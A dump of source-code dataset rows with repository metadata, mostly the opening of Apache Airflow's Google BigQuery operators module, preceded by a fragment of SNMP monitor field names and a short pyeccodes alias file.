falconInput20Reading=falconInput20Reading, falconInput6HighLimit2=falconInput6HighLimit2, falconInput7HighAlarm=falconInput7HighAlarm, falconInput5LowLimit2=falconInput5LowLimit2, falconInput8DigAlarm=falconInput8DigAlarm, falconRelay5Status=falconRelay5Status, falconInput3Gain=falconInput3Gain, falconInput8LowLimit2=falconInput8LowLimit2, falconInput8Delay=falconInput8Delay, falconInput17Delay=falconInput17Delay, falconRelay6Time=falconRelay6Time, falconInput2Label=falconInput2Label, falconKeypadCode20=falconKeypadCode20, falconInput19Label=falconInput19Label, falconInput15State=falconInput15State, falconInput1Offset=falconInput1Offset, falconInput5LowAlarm=falconInput5LowAlarm, falconInput12Label=falconInput12Label, falconInput13DigAlarm=falconInput13DigAlarm, falconInput17Reading=falconInput17Reading, falconIdentSpecific=falconIdentSpecific, falconInput20=falconInput20, falconInput6Offset=falconInput6Offset, falconAlarmHistoryText=falconAlarmHistoryText, falconDoorAlarmBypass=falconDoorAlarmBypass, falconInput6High2Alarm=falconInput6High2Alarm, falconInput1Hysteresis=falconInput1Hysteresis, falconRelay1Status=falconRelay1Status, falconKeypadName4=falconKeypadName4, falconInput4HighAlarm=falconInput4HighAlarm, falconInput5=falconInput5, falconInput15RlyControl=falconInput15RlyControl, falconRelay1=falconRelay1, falconInput3Offset=falconInput3Offset, falconRelay4Time=falconRelay4Time, falconRelay3Status=falconRelay3Status, falconAlarmTable=falconAlarmTable, falconInput15Reading=falconInput15Reading, falconInput9Delay=falconInput9Delay, falconInput1High2Alarm=falconInput1High2Alarm, falconInput4Label=falconInput4Label, falconAlarmDescr=falconAlarmDescr, falconInput3HighLimit2=falconInput3HighLimit2, falconInput18DigAlarm=falconInput18DigAlarm, falconInput11Label=falconInput11Label, falconInput19=falconInput19, falconInput7HighLimit2=falconInput7HighLimit2, falconKeypadCode9=falconKeypadCode9, falconInput8HighLimit=falconInput8HighLimit, falconInput1HighLimit2=falconInput1HighLimit2, falconKeypadCode6=falconKeypadCode6, falconKeypadName6=falconKeypadName6, falconInput1Label=falconInput1Label, falconRelay1Time=falconRelay1Time, falconRelay6=falconRelay6, falconAccessDenied=falconAccessDenied, falconInput3Label=falconInput3Label, falconInput14DigAlarm=falconInput14DigAlarm, rle=rle, falconInput2Offset=falconInput2Offset, falconInput2LowLimit2=falconInput2LowLimit2, falconInput5LowLimit=falconInput5LowLimit, falconInput16Delay=falconInput16Delay, falconInput8=falconInput8, falconInput15Delay=falconInput15Delay, falconInput9=falconInput9, falconRelay2Status=falconRelay2Status)
| true | true |
1c2cbe68ab282adbdc53a934704dba7d236fc71d | 177 | py | Python | pyeccodes/defs/mars/grib_enfh_icp_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | 7 | 2020-04-14T09:41:17.000Z | 2021-08-06T09:38:19.000Z | pyeccodes/defs/mars/grib_enfh_pf_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | null | null | null | pyeccodes/defs/mars/grib_enfh_pf_def.py | ecmwf/pyeccodes | dce2c72d3adcc0cb801731366be53327ce13a00b | [
"Apache-2.0"
] | 3 | 2020-04-30T12:44:48.000Z | 2020-12-15T08:40:26.000Z | import pyeccodes.accessors as _
def load(h):
h.alias('mars.hdate', 'dataDate')
h.alias('mars.date', 'referenceDate')
h.alias('mars.number', 'perturbationNumber')
| 19.666667 | 48 | 0.672316 | import pyeccodes.accessors as _
def load(h):
h.alias('mars.hdate', 'dataDate')
h.alias('mars.date', 'referenceDate')
h.alias('mars.number', 'perturbationNumber')
| true | true |
1c2cbedcb423f26700da2934e9ec94f26ab289ff | 99,243 | py | Python | airflow/providers/google/cloud/operators/bigquery.py | pchico83/airflow | e3e8f502fe318862fed0795141e3d8281e283e6b | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 1 | 2020-05-28T13:30:38.000Z | 2020-05-28T13:30:38.000Z | airflow/providers/google/cloud/operators/bigquery.py | Sri-nidhi/Airflow | 86ad628158eb728e56c817eea2bea4ddcaa571c2 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | airflow/providers/google/cloud/operators/bigquery.py | Sri-nidhi/Airflow | 86ad628158eb728e56c817eea2bea4ddcaa571c2 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 2 | 2021-05-05T07:36:36.000Z | 2021-11-10T17:32:39.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
"""This module contains Google BigQuery operators."""
import enum
import hashlib
import json
import re
import uuid
import warnings
from datetime import datetime
from typing import Any, Dict, Iterable, List, Optional, Sequence, Set, SupportsAbs, Union
import attr
from google.api_core.exceptions import Conflict
from google.cloud.bigquery import TableReference
from airflow.exceptions import AirflowException
from airflow.models import BaseOperator, BaseOperatorLink
from airflow.models.taskinstance import TaskInstance
from airflow.operators.sql import SQLCheckOperator, SQLIntervalCheckOperator, SQLValueCheckOperator
from airflow.providers.google.cloud.hooks.bigquery import BigQueryHook, BigQueryJob
from airflow.providers.google.cloud.hooks.gcs import GCSHook, _parse_gcs_url
from airflow.utils.decorators import apply_defaults
BIGQUERY_JOB_DETAILS_LINK_FMT = "https://console.cloud.google.com/bigquery?j={job_id}"
_DEPRECATION_MSG = (
"The bigquery_conn_id parameter has been deprecated. You should pass the gcp_conn_id parameter."
)
class BigQueryUIColors(enum.Enum):
"""Hex colors for BigQuery operators"""
CHECK = "#C0D7FF"
QUERY = "#A1BBFF"
TABLE = "#81A0FF"
DATASET = "#5F86FF"
class BigQueryConsoleLink(BaseOperatorLink):
"""Helper class for constructing BigQuery link."""
name = 'BigQuery Console'
def get_link(self, operator, dttm):
ti = TaskInstance(task=operator, execution_date=dttm)
job_id = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id) if job_id else ''
@attr.s(auto_attribs=True)
class BigQueryConsoleIndexableLink(BaseOperatorLink):
"""Helper class for constructing BigQuery link."""
index: int = attr.ib()
@property
def name(self) -> str:
return f'BigQuery Console #{self.index + 1}'
def get_link(self, operator: BaseOperator, dttm: datetime):
ti = TaskInstance(task=operator, execution_date=dttm)
job_ids = ti.xcom_pull(task_ids=operator.task_id, key='job_id')
if not job_ids:
return None
if len(job_ids) < self.index:
return None
job_id = job_ids[self.index]
return BIGQUERY_JOB_DETAILS_LINK_FMT.format(job_id=job_id)
class _BigQueryDbHookMixin:
def get_db_hook(self) -> BigQueryHook:
"""Get BigQuery DB Hook"""
return BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
use_legacy_sql=self.use_legacy_sql,
location=self.location,
impersonation_chain=self.impersonation_chain,
labels=self.labels,
)
class BigQueryCheckOperator(_BigQueryDbHookMixin, SQLCheckOperator):
"""
Performs checks against BigQuery. The ``BigQueryCheckOperator`` expects
a sql query that will return a single row. Each value on that
first row is evaluated using python ``bool`` casting. If any of the
values return ``False`` the check is failed and errors out.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryCheckOperator`
Note that Python bool casting evals the following as ``False``:
* ``False``
* ``0``
* Empty string (``""``)
* Empty list (``[]``)
* Empty dictionary or set (``{}``)
Given a query like ``SELECT COUNT(*) FROM foo``, it will fail only if
the count ``== 0``. You can craft much more complex query that could,
for instance, check that the table has the same number of rows as
the source table upstream, or that the count of today's partition is
greater than yesterday's partition, or that a set of metrics are less
than 3 standard deviation for the 7 day average.
This operator can be used as a data quality check in your pipeline, and
depending on where you put it in your DAG, you have the choice to
stop the critical path, preventing from
publishing dubious data, or on the side and receive email alerts
without stopping the progress of the DAG.
:param sql: the sql to be executed
:type sql: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
:param location: The geographic location of the job. See details at:
https://cloud.google.com/bigquery/docs/locations#specifying_your_location
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param labels: a dictionary containing labels for the table, passed to BigQuery
:type labels: dict
"""
template_fields = (
'sql',
'gcp_conn_id',
'impersonation_chain',
'labels',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
sql: str,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[dict] = None,
**kwargs,
) -> None:
super().__init__(sql=sql, **kwargs)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.gcp_conn_id = gcp_conn_id
self.sql = sql
self.use_legacy_sql = use_legacy_sql
self.location = location
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryValueCheckOperator(_BigQueryDbHookMixin, SQLValueCheckOperator):
"""
Performs a simple value check using sql code.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryValueCheckOperator`
:param sql: the sql to be executed
:type sql: str
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param location: The geographic location of the job. See details at:
https://cloud.google.com/bigquery/docs/locations#specifying_your_location
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param labels: a dictionary containing labels for the table, passed to BigQuery
:type labels: dict
"""
template_fields = (
'sql',
'gcp_conn_id',
'pass_value',
'impersonation_chain',
'labels',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
sql: str,
pass_value: Any,
tolerance: Any = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[dict] = None,
**kwargs,
) -> None:
super().__init__(sql=sql, pass_value=pass_value, tolerance=tolerance, **kwargs)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.location = location
self.gcp_conn_id = gcp_conn_id
self.use_legacy_sql = use_legacy_sql
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryIntervalCheckOperator(_BigQueryDbHookMixin, SQLIntervalCheckOperator):
"""
Checks that the values of metrics given as SQL expressions are within
a certain tolerance of the ones from days_back before.
This method constructs a query like so ::
SELECT {metrics_threshold_dict_key} FROM {table}
WHERE {date_filter_column}=<date>
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryIntervalCheckOperator`
:param table: the table name
:type table: str
:param days_back: number of days between ds and the ds we want to check
against. Defaults to 7 days
:type days_back: int
:param metrics_thresholds: a dictionary of ratios indexed by metrics, for
example 'COUNT(*)': 1.5 would require a 50 percent or less difference
between the current day, and the prior days_back.
:type metrics_thresholds: dict
:param use_legacy_sql: Whether to use legacy SQL (true)
or standard SQL (false).
:type use_legacy_sql: bool
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param location: The geographic location of the job. See details at:
https://cloud.google.com/bigquery/docs/locations#specifying_your_location
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
:param labels: a dictionary containing labels for the table, passed to BigQuery
:type labels: dict
"""
template_fields = (
'table',
'gcp_conn_id',
'sql1',
'sql2',
'impersonation_chain',
'labels',
)
ui_color = BigQueryUIColors.CHECK.value
@apply_defaults
def __init__(
self,
*,
table: str,
metrics_thresholds: dict,
date_filter_column: str = 'ds',
days_back: SupportsAbs[int] = -7,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
use_legacy_sql: bool = True,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
labels: Optional[Dict] = None,
**kwargs,
) -> None:
super().__init__(
table=table,
metrics_thresholds=metrics_thresholds,
date_filter_column=date_filter_column,
days_back=days_back,
**kwargs,
)
if bigquery_conn_id:
warnings.warn(_DEPRECATION_MSG, DeprecationWarning, stacklevel=3)
gcp_conn_id = bigquery_conn_id
self.gcp_conn_id = gcp_conn_id
self.use_legacy_sql = use_legacy_sql
self.location = location
self.impersonation_chain = impersonation_chain
self.labels = labels
class BigQueryGetDataOperator(BaseOperator):
"""
Fetches the data from a BigQuery table (alternatively fetch data for selected columns)
and returns data in a python list. The number of elements in the returned list will
be equal to the number of rows fetched. Each element in the list will again be a list
where element would represent the columns values for that row.
**Example Result**: ``[['Tony', '10'], ['Mike', '20'], ['Steve', '15']]``
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryGetDataOperator`
.. note::
If you pass fields to ``selected_fields`` which are in different order than the
order of columns already in
BQ table, the data will still be in the order of BQ table.
For example if the BQ table has 3 columns as
``[A,B,C]`` and you pass 'B,A' in the ``selected_fields``
the data would still be of the form ``'A,B'``.
**Example**: ::
get_data = BigQueryGetDataOperator(
task_id='get_data_from_bq',
dataset_id='test_dataset',
table_id='Transaction_partitions',
max_results=100,
selected_fields='DATE',
gcp_conn_id='airflow-conn-id'
)
:param dataset_id: The dataset ID of the requested table. (templated)
:type dataset_id: str
:param table_id: The table ID of the requested table. (templated)
:type table_id: str
:param max_results: The maximum number of records (rows) to be fetched
from the table. (templated)
:type max_results: int
:param selected_fields: List of fields to return (comma-separated). If
unspecified, all fields are returned.
:type selected_fields: str
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param location: The location used for the operation.
:type location: str
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'dataset_id',
'table_id',
'max_results',
'selected_fields',
'impersonation_chain',
)
ui_color = BigQueryUIColors.QUERY.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_id: str,
max_results: int = 100,
selected_fields: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.table_id = table_id
self.max_results = int(max_results)
self.selected_fields = selected_fields
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> list:
self.log.info(
'Fetching Data from %s.%s max results: %s', self.dataset_id, self.table_id, self.max_results
)
hook = BigQueryHook(
bigquery_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
rows = hook.list_rows(
dataset_id=self.dataset_id,
table_id=self.table_id,
max_results=self.max_results,
selected_fields=self.selected_fields,
location=self.location,
)
self.log.info('Total extracted rows: %s', len(rows))
table_data = [row.values() for row in rows]
return table_data
# pylint: disable=too-many-instance-attributes
class BigQueryExecuteQueryOperator(BaseOperator):
"""
Executes BigQuery SQL queries in a specific BigQuery database.
This operator does not assert idempotency.
:param sql: the sql code to be executed (templated)
:type sql: Can receive a str representing a sql statement,
a list of str (sql statements), or reference to a template file.
Template reference are recognized by str ending in '.sql'.
:param destination_dataset_table: A dotted
``(<project>.|<project>:)<dataset>.<table>`` that, if set, will store the results
of the query. (templated)
:type destination_dataset_table: str
:param write_disposition: Specifies the action that occurs if the destination table
already exists. (default: 'WRITE_EMPTY')
:type write_disposition: str
:param create_disposition: Specifies whether the job is allowed to create new tables.
(default: 'CREATE_IF_NEEDED')
:type create_disposition: str
:param allow_large_results: Whether to allow large results.
:type allow_large_results: bool
:param flatten_results: If true and query uses legacy SQL dialect, flattens
all nested and repeated fields in the query results. ``allow_large_results``
must be ``true`` if this is set to ``false``. For standard SQL queries, this
flag is ignored and results are never flattened.
:type flatten_results: bool
:param gcp_conn_id: (Optional) The connection ID used to connect to Google Cloud.
:type gcp_conn_id: str
:param bigquery_conn_id: (Deprecated) The connection ID used to connect to Google Cloud.
This parameter has been deprecated. You should pass the gcp_conn_id parameter instead.
:type bigquery_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param udf_config: The User Defined Function configuration for the query.
See https://cloud.google.com/bigquery/user-defined-functions for details.
:type udf_config: list
:param use_legacy_sql: Whether to use legacy SQL (true) or standard SQL (false).
:type use_legacy_sql: bool
:param maximum_billing_tier: Positive integer that serves as a multiplier
of the basic price.
Defaults to None, in which case it uses the value set in the project.
:type maximum_billing_tier: int
:param maximum_bytes_billed: Limits the bytes billed for this job.
Queries that will have bytes billed beyond this limit will fail
(without incurring a charge). If unspecified, this will be
set to your project default.
:type maximum_bytes_billed: float
:param api_resource_configs: a dictionary that contain params
'configuration' applied for Google BigQuery Jobs API:
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs
for example, {'query': {'useQueryCache': False}}. You could use it
if you need to provide some params that are not supported by BigQueryOperator
like args.
:type api_resource_configs: dict
:param schema_update_options: Allows the schema of the destination
table to be updated as a side effect of the load job.
:type schema_update_options: Optional[Union[list, tuple, set]]
:param query_params: a list of dictionary containing query parameter types and
values, passed to BigQuery. The structure of dictionary should look like
'queryParameters' in Google BigQuery Jobs API:
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs.
For example, [{ 'name': 'corpus', 'parameterType': { 'type': 'STRING' },
'parameterValue': { 'value': 'romeoandjuliet' } }]. (templated)
:type query_params: list
:param labels: a dictionary containing labels for the job/query,
passed to BigQuery
:type labels: dict
:param priority: Specifies a priority for the query.
Possible values include INTERACTIVE and BATCH.
The default value is INTERACTIVE.
:type priority: str
:param time_partitioning: configure optional time partitioning fields i.e.
partition by field, type and expiration as per API specifications.
:type time_partitioning: dict
:param cluster_fields: Request that the result of this query be stored sorted
by one or more columns. BigQuery supports clustering for both partitioned and
non-partitioned tables. The order of columns given determines the sort order.
:type cluster_fields: list[str]
:param location: The geographic location of the job. Required except for
US and EU. See details at
https://cloud.google.com/bigquery/docs/locations#specifying_your_location
:type location: str
:param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).
**Example**: ::
encryption_configuration = {
"kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
}
:type encryption_configuration: dict
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
account from the list granting this role to the originating account (templated).
:type impersonation_chain: Union[str, Sequence[str]]
"""
template_fields = (
'sql',
'destination_dataset_table',
'labels',
'query_params',
'impersonation_chain',
)
template_ext = ('.sql',)
ui_color = BigQueryUIColors.QUERY.value
@property
def operator_extra_links(self):
"""Return operator extra links"""
if isinstance(self.sql, str):
return (BigQueryConsoleLink(),)
return (BigQueryConsoleIndexableLink(i) for i, _ in enumerate(self.sql))
# pylint: disable=too-many-arguments, too-many-locals
@apply_defaults
def __init__(
self,
*,
sql: Union[str, Iterable],
destination_dataset_table: Optional[str] = None,
write_disposition: str = 'WRITE_EMPTY',
allow_large_results: Optional[bool] = False,
flatten_results: Optional[bool] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
udf_config: Optional[list] = None,
use_legacy_sql: bool = True,
maximum_billing_tier: Optional[int] = None,
maximum_bytes_billed: Optional[float] = None,
create_disposition: str = 'CREATE_IF_NEEDED',
schema_update_options: Optional[Union[list, tuple, set]] = None,
query_params: Optional[list] = None,
labels: Optional[dict] = None,
priority: str = 'INTERACTIVE',
time_partitioning: Optional[dict] = None,
api_resource_configs: Optional[dict] = None,
cluster_fields: Optional[List[str]] = None,
location: Optional[str] = None,
encryption_configuration: Optional[dict] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
)
gcp_conn_id = bigquery_conn_id
warnings.warn(
"This operator is deprecated. Please use `BigQueryInsertJobOperator`.",
DeprecationWarning,
)
self.sql = sql
self.destination_dataset_table = destination_dataset_table
self.write_disposition = write_disposition
self.create_disposition = create_disposition
self.allow_large_results = allow_large_results
self.flatten_results = flatten_results
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.udf_config = udf_config
self.use_legacy_sql = use_legacy_sql
self.maximum_billing_tier = maximum_billing_tier
self.maximum_bytes_billed = maximum_bytes_billed
self.schema_update_options = schema_update_options
self.query_params = query_params
self.labels = labels
self.priority = priority
self.time_partitioning = time_partitioning
self.api_resource_configs = api_resource_configs
self.cluster_fields = cluster_fields
self.location = location
self.encryption_configuration = encryption_configuration
self.hook = None # type: Optional[BigQueryHook]
self.impersonation_chain = impersonation_chain
def execute(self, context):
if self.hook is None:
self.log.info('Executing: %s', self.sql)
self.hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
use_legacy_sql=self.use_legacy_sql,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
if isinstance(self.sql, str):
job_id = self.hook.run_query(
sql=self.sql,
destination_dataset_table=self.destination_dataset_table,
write_disposition=self.write_disposition,
allow_large_results=self.allow_large_results,
flatten_results=self.flatten_results,
udf_config=self.udf_config,
maximum_billing_tier=self.maximum_billing_tier,
maximum_bytes_billed=self.maximum_bytes_billed,
create_disposition=self.create_disposition,
query_params=self.query_params,
labels=self.labels,
schema_update_options=self.schema_update_options,
priority=self.priority,
time_partitioning=self.time_partitioning,
api_resource_configs=self.api_resource_configs,
cluster_fields=self.cluster_fields,
encryption_configuration=self.encryption_configuration,
)
elif isinstance(self.sql, Iterable):
job_id = [
self.hook.run_query(
sql=s,
destination_dataset_table=self.destination_dataset_table,
write_disposition=self.write_disposition,
allow_large_results=self.allow_large_results,
flatten_results=self.flatten_results,
udf_config=self.udf_config,
maximum_billing_tier=self.maximum_billing_tier,
maximum_bytes_billed=self.maximum_bytes_billed,
create_disposition=self.create_disposition,
query_params=self.query_params,
labels=self.labels,
schema_update_options=self.schema_update_options,
priority=self.priority,
time_partitioning=self.time_partitioning,
api_resource_configs=self.api_resource_configs,
cluster_fields=self.cluster_fields,
encryption_configuration=self.encryption_configuration,
)
for s in self.sql
]
else:
raise AirflowException(f"argument 'sql' of type {type(str)} is neither a string nor an iterable")
context['task_instance'].xcom_push(key='job_id', value=job_id)
def on_kill(self) -> None:
super().on_kill()
if self.hook is not None:
self.log.info('Cancelling running query')
self.hook.cancel_query()
class BigQueryCreateEmptyTableOperator(BaseOperator):
"""
Creates a new, empty table in the specified BigQuery dataset,
optionally with schema.
The schema to be used for the BigQuery table may be specified in one of
two ways. You may either directly pass the schema fields in, or you may
point the operator to a Google Cloud Storage object name. The object in
Google Cloud Storage must be a JSON file with the schema fields in it.
You can also create a table without schema.
.. seealso::
For more information on how to use this operator, take a look at the guide:
:ref:`howto/operator:BigQueryCreateEmptyTableOperator`
:param project_id: The project to create the table into. (templated)
:type project_id: str
:param dataset_id: The dataset to create the table into. (templated)
:type dataset_id: str
:param table_id: The Name of the table to be created. (templated)
:type table_id: str
:param table_resource: Table resource as described in documentation:
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#Table
If provided all other parameters are ignored.
:type table_resource: Dict[str, Any]
:param schema_fields: If set, the schema field list as defined here:
https://cloud.google.com/bigquery/docs/reference/rest/v2/jobs#configuration.load.schema
**Example**: ::
schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
{"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}]
:type schema_fields: list
:param gcs_schema_object: Full path to the JSON file containing
schema (templated). For
example: ``gs://test-bucket/dir1/dir2/employee_schema.json``
:type gcs_schema_object: str
:param time_partitioning: configure optional time partitioning fields i.e.
partition by field, type and expiration as per API specifications.
.. seealso::
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#timePartitioning
:type time_partitioning: dict
:param bigquery_conn_id: [Optional] The connection ID used to connect to Google Cloud and
interact with the Bigquery service.
:type bigquery_conn_id: str
:param google_cloud_storage_conn_id: [Optional] The connection ID used to connect to Google Cloud.
and interact with the Google Cloud Storage service.
:type google_cloud_storage_conn_id: str
:param delegate_to: The account to impersonate using domain-wide delegation of authority,
if any. For this to work, the service account making the request must have
domain-wide delegation enabled.
:type delegate_to: str
:param labels: a dictionary containing labels for the table, passed to BigQuery
**Example (with schema JSON in GCS)**: ::
CreateTable = BigQueryCreateEmptyTableOperator(
task_id='BigQueryCreateEmptyTableOperator_task',
dataset_id='ODS',
table_id='Employees',
project_id='internal-gcp-project',
gcs_schema_object='gs://schema-bucket/employee_schema.json',
bigquery_conn_id='airflow-conn-id',
google_cloud_storage_conn_id='airflow-conn-id'
)
**Corresponding Schema file** (``employee_schema.json``): ::
[
{
"mode": "NULLABLE",
"name": "emp_name",
"type": "STRING"
},
{
"mode": "REQUIRED",
"name": "salary",
"type": "INTEGER"
}
]
**Example (with schema in the DAG)**: ::
CreateTable = BigQueryCreateEmptyTableOperator(
task_id='BigQueryCreateEmptyTableOperator_task',
dataset_id='ODS',
table_id='Employees',
project_id='internal-gcp-project',
schema_fields=[{"name": "emp_name", "type": "STRING", "mode": "REQUIRED"},
{"name": "salary", "type": "INTEGER", "mode": "NULLABLE"}],
bigquery_conn_id='airflow-conn-id-account',
google_cloud_storage_conn_id='airflow-conn-id'
)
:type labels: dict
:param view: [Optional] A dictionary containing definition for the view.
If set, it will create a view instead of a table:
.. seealso::
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#ViewDefinition
:type view: dict
:param materialized_view: [Optional] The materialized view definition.
:type materialized_view: dict
:param encryption_configuration: [Optional] Custom encryption configuration (e.g., Cloud KMS keys).
**Example**: ::
encryption_configuration = {
"kmsKeyName": "projects/testp/locations/us/keyRings/test-kr/cryptoKeys/test-key"
}
:type encryption_configuration: dict
:param location: The location used for the operation.
:type location: str
:param cluster_fields: [Optional] The fields used for clustering.
BigQuery supports clustering for both partitioned and
non-partitioned tables.
.. seealso::
https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#clustering.fields
:type cluster_fields: list
:param impersonation_chain: Optional service account to impersonate using short-term
credentials, or chained list of accounts required to get the access_token
of the last account in the list, which will be impersonated in the request.
If set as a string, the account must grant the originating account
the Service Account Token Creator IAM role.
If set as a sequence, the identities from the list must grant
Service Account Token Creator IAM role to the directly preceding identity, with first
